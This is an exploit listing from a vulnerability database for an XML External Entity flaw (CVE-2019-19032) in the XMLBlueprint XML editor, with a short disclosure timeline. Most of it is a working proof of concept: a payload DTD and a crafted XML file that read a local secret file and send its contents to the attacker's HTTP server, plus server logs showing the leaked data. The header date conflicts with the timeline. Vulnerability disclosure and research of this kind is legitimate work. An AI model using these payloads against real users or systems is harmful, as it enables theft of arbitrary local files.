Share
## https://sploitus.com/exploit?id=PACKETSTORM:156139
# Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection  
# Exploit Author: Javier Olmedo  
# Date: 2018-11-14  
# Vendor: XMLBlueprint XML Editor  
# Software Link: https://www.xmlblueprint.com/update/download-64bit.exe  
# Affected Version: 16.191112 and before  
# Patched Version: unpatched  
# Category: Local  
# Platform: XML  
# Tested on: Windows 10 Pro  
# CWE: https://cwe.mitre.org/data/definitions/611.html  
# CVE: 2019-19032  
# References:  
# https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/  
  
# 1. Technical Description  
# XMLBlueprint XML Editor version 16.191112 and before are affected by XML External Entity  
# Injection vulnerability through the malicious XML file. This allows a malicious user  
# to read arbitrary files.  
  
# 2. Proof Of Concept (PoC)  
# 2.1 Start a webserver to receive the connection.  
  
python -m SimpleHTTPServer 80  
  
# 2.2 Upload the payload.dtd file to your web server.  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">  
%all;  
  
# 2.3 Create a secret.txt file with any content in desktop.  
  
# 2.4 Open poc.xml and click XML -> Validate  
  
<?xml version="1.0"?>  
<!DOCTYPE test [  
<!ENTITY % file SYSTEM "file:///C:\Users\jolmedo\Desktop\secret.txt">  
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">  
%dtd;]>  
<pwn>&send;</pwn>  
  
# 2.5 Your web server will receive a request with the contents of the secret.txt file  
  
Serving HTTP on 0.0.0.0 port 8000 ...  
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -  
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -  
  
# 3. Timeline  
# 13, november 2019 - [RESEARCHER] Discover  
# 13, november 2019 - [RESEARCHER] Report to vendor support  
# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability  
# 15, november 2019 - [RESEARCHER] Detailed vulnerability report  
# 22, november 2019 - [RESEARCHER] Public disclosure  
  
# 4. Disclaimer  
# The information contained in this notice is provided without any guarantee of use or otherwise.  
# The redistribution of this notice is explicitly permitted for insertion into vulnerability  
# databases, provided that it is not modified and due credit is granted to the author.  
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.  
# All content (c)  
# Javier Olmedo